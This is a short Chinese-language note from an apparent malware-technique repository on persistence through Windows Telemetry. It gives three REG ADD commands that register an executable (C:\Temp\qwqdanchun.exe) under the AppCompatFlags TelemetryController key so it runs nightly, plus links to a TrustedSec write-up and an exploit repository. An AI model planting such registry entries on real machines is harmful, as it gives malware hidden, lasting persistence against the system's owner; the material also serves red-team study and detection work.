Malware-Note/persistence/uncatelogued/windows-telemetry.md

894 B
Raw Permalink Blame History

Windows Telemetry

在Windows 7之后的Windows操作系统都存在这一个监测数据收集服务如果加入了Microsoft用户反馈改善计划该服务就会监测系统异常并收集反馈到微软。

命令行:

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Command /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Nightly /t REG_DWORD /d 1 /f

原理:

{% embed url="https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/" caption="" %}

利用代码:

{% embed url="https://github.com/360-Linton-Lab/Telemetry" caption="" %}